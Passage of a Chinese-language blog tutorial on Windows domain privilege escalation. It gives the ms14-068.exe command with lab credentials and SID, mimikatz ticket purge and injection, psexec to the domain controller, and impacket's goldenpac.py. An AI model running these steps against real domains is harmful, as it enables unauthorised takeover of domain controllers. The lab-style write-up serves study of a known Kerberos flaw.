zoukankan
html css js c++ java
MS14-068提权和impacket工具包提权
ms14-068提权
工具利用
a)拿下边界机win7,并已经有win7上任意一个账号的密码
-u 用户名@域
-p 用户密码
-s 用户sid
-d 域控
ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com
生成一个ccache后缀票据
导入票据
导入之前,清空票据缓存
kerberos::purge
kerberos::ptc 票据
使用psexec工具连接win08(域控机器)尝试执行命令,看到的权限是test3的,但是实际上所属已经是win08上,并且是最高权限
impacket工具包提权
b) 没拿到边界机,但是有账号密码的情况
使用/impacket/examples下的goldenpac.py脚本
注意@domain-host 指的是域控机的位置
成功进入win08的命令行模式
查看全文
相关阅读:
Ubuntu中php.ini修改运行内存
Parse error: syntax error, unexpected end of file in * 的解决办法
php函数积累
php值传递和引用传递
kohana导入和导出
gleez框架获得时间控件
php获得时间段的月
图片垂直居中代码
三角代码
HTML5 SVG可爱笑脸动画
原文地址:https://www.cnblogs.com/sup3rman/p/12329854.html
最新文章
编程之禅阅读笔记01
个人作业3
进度三
构建之法阅读笔记03
构建之法阅读笔记02
个人作业2
怎样高效地报告Bug
[kuangbin带你飞]专题五 并查集
启发式合并CSU
启发式合并CodeForces
热门文章
启发式合并 CodeForces
小程序如何设置底部菜单以及设置颜色
小程序之组件
并查集
游标
视图和触发器部分
完整性,模式,建表,建索引
php导出csv
jquery 表单提交不用action
常用的jquery遍历函数
Copyright © 2011-2022 走看看